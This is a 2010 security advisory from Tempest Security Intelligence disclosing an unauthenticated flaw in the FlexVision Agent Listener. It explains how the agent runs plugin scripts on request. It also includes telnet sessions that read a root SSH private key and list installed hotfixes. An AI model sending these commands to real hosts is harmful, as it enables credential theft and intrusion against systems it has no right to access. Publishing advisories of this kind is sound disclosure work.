FlexVision Agent Listener Information Disclosure

`=====[ Tempest Security Intelligence - Advisory #02 / 2010 ]=============  
  
Information Disclosure Vulnerability in FlexVision Agent Listener  
-----------------------------------------------------------------  
  
  
Authors: Victor Ribeiro Hora <victor *SPAM* tempest.com.br  
<http://tempest.com.br>>  
Tempest Security Intelligence - Brazil  
  
  
=====[ Table of Contents ]=================================  
  
1. Overview  
2. Detailed description  
3. Additional context & Solutions  
4. References  
5. Thanks  
  
  
=====[ Overview ]======================================  
  
* System affected: FlexVision Agent Listener 1.3 for Windows, Linux and  
Solaris  
(other versions may be vulnerable)  
  
* Release date: 22 October 2010  
  
* Impact: Successful exploitation of this vulnerability may lead to  
remote server sensitive information disclosure.  
  
FlexVision [1] claims to be an IT service focused on hardware and  
software management, offering features like capacity planning, SLA  
monitoring and systems inventory. The service is used by several major  
companies in Brazil, including banking, telecom, energy, health and  
independent product sectors.  
  
The vulnerability was found in the inventory agent listener or "fval".  
Exploitation of this weakness does not require any authentication and  
may lead to remote disclosure of sensitive information from the server  
running the agent.  
  
Specifically, an attacker can download non-binary files, and list  
running services, running processes and installed software. It seems  
there is some active filtering for known sensitive data, but other  
sensitive information may leak.  
  
=====[ Detailed description ]================================  
  
FlexVision Inventory service has several agents (servers) to collect  
data from different platforms and send them to a central console on the  
network. These agents are installed on the hardware to be monitored and  
listen for incoming client connections.  
  
One of the agents that was analyzed is the "FlexVision Actions Listener  
1.3 for Linux", used for the inventory of Linux systems. This agent is  
executed by a Linux binary called "fval" started at boot time through an  
initscript in /etc/init.d/rc.fval. Apparently the fval binary executes a  
chdir() to /opt/flex/plugins, then it opens a socket listening for  
connections on port 3810/TCP in daemon mode.  
  
As soon as the TCP Three-Way Handshake is completed, the agent keeps  
waiting for "commands" to perform the various inventory functions. These  
commands are interpreted as internal functions of the fval binary, such  
as help, version, exit or run.   
  
Specifically, the run function expects a parameter. We noted that this  
parameter is a bash script file in the /opt/flex/plugins directory. This  
script is executed by the fval binary, and the output of the script is  
returned on the same TCP connection to the central console application.  
These commands are normally sent from a central console to the monitored  
agent.  
  
As the connection is not authenticated nor encrypted in any way, it  
gives the possibility of any computer that has access to the 3810/TCP  
port of any agent, sending commands to be executed by the agent.  
  
In spite of the fact that the agent uses an active filter for some well  
known sensitive data (like password hashes in the "shadow" file, for  
example), it is possible to get other not easily predictable but  
sensitive data. Some special chars we tested were also filtered, such as  
'*', ';', '>' , and also white spaces, tabs and other special  
delimiters used on bash and other shells.  
  
  
The following is an example of the recovery of a private SSH RSA key  
file that belongs to the root user on a Linux server:  
  
-----------------------------------------------------------------------  
  
vrh@victim01:~$ telnet 192.168.1.1 3810  
Trying 192.168.1.1...  
Connected to 192.168.1.1.  
Escape character is '^]'.  
FVAL>run symonfile.sh /root/.ssh id_rsa  
-----BEGIN RSA PRIVATE KEY-----  
MIIEogIBAAKCAQEA3wKpWZ0xgmIWX4JVb72wt5STGdhr2x0whvY25hhNfI9zpNIG  
eV0zRXy4hbVqRvcJVu3+Ho6ZyXIg8bVzljFJdx/anBs5KLrlvfoMDrgwNWtp8Slz  
Fuhfp7ej0wr57ZRyKq4imz3vvle24SRtROymSMDCtolbY4wZFCRu6JJ+3jAVqlxJ  
9YMdVqL7BoF0Nbp+s7FqIdbpwwOtcS0PpprvWTbFcQ+z3ReN7B7SybZTkuZPD56o  
z1QtnzhgnVFHBD3TPXPorKf42uuDeW3twFKYlFOuSmz46tKCsbBoM8TBPNtYCvAe  
3G7Aj0R/jvBdL9+hz/cG+riwL0NYTSe7uTO4kQIBIwKCAQATHXw64ZaHhMAW0Kg8  
xx3Gl7TWVGEEJxLJvVUpqk/I2RiKeGb0dbPwA2BF+ZtlKx4Ow/E10bVpCchPO3BO  
s8R37MmYWhrXmv2/05qiLQtySwkUq8gJRx4kUZGzAPDZ2YYg6lq82WxSJMaIU5RW  
XW1WsW/GgM1RrOw07S4T70yz9VUvFo4M5m7GMP0AjffvJv8dhABNRPV1uzBGqjyV  
  
-----------------------------------------------------------------------  
  
Just like Linux fval, on Windows it's also possible to dump any  
non-binary file. It's worth saying that as fval always runs as  
privileged user (Administrator/root), all the system files are  
accessible and most of them are readable.  
  
Windows hosts behave similary. As soon as the Agent is installed, it is  
registered as a System Service and runs at boot time. This service runs  
the fval binary located at %SystemDrive%\%ProgramFiles%\Flexvision.  
Then, fval will run any file in the  
%SystemDrive%\%ProgramFiles%\Flexvision\Plugins directory.  
  
By default, Windows fval has several 32bit Portable Executable (.EXE)  
files to provide inventory data to the central console, but most  
interesting is the hotfix.exe file, which lists all the installed  
HotFixes on the host:  
  
-----------------------------------------------------------------------  
  
vrh@victim01:~$ telnet 192.168.1.2 3810  
Trying 192.168.1.2...  
Connected to 192.168.1.2.  
Escape character is '^]'.  
FVAL>run hotfix.exe  
Hot Fix ID.75=File 1  
Service pack afetado.75=KB956801  
Instalado por.75=  
Descricao.76=  
Hot Fix ID.76=File 1  
Service pack afetado.76=KB956806  
Instalado por.76=  
Descricao.77=  
Hot Fix ID.77=File 1  
Service pack afetado.77=KB956848  
Instalado por.77=  
  
-----------------------------------------------------------------------  
  
With that sort of info it would be possible to plan and execute a much  
more precise attack against the host.  
  
=====[ Other contexts & Solutions ]============================  
  
As usual [2], we contacted the vendor. After some weeks, they released  
version 1.4 that usessource IP based access (whitelist policy) and a  
static key for authentication, but nothing to address the actual  
problem: no strong authentication scheme and no encrypted client-server  
traffic. Version 2.0 was just released, the vendor states that this  
version uses encrypted client-server communication, but we were unable  
to test it until now. After waiting a few months, FlexVision did not  
provide us a public URL with an actual fix which addresses this problem  
to attach in this publication.   
  
=====[ Thanks ]========================================  
  
- Tempest Security Intelligence [3] - Tempest MSS Team  
- Evandro Curvelo Hora <evandro *SPAM* tempest.com.br  
<http://tempest.com.br>>  
- Marco "Kiko" Carnut <kiko *SPAM* tempest.com.br <http://tempest.com.br>>  
- Cristiano Lincoln Mattos <lincoln *SPAM* tempest.com.br  
<http://tempest.com.br>>  
- Aldo Albuquerque <aldo *SPAM* tempest.com.br <http://tempest.com.br>>  
  
=====[ References ]======================================  
  
[1] http://www.flexvision.com.br/  
[2] http://www.cert.org/kb/vul_disclosure.html  
[3] http://www.tempest.com.br/  
  
===================================================  
  
--   
Victor Ribeiro Hora <[email protected]>  
Network Security Analyst & Security Baselines development  
Tempest Security Intelligence  
www.tempest.com.br  
  
`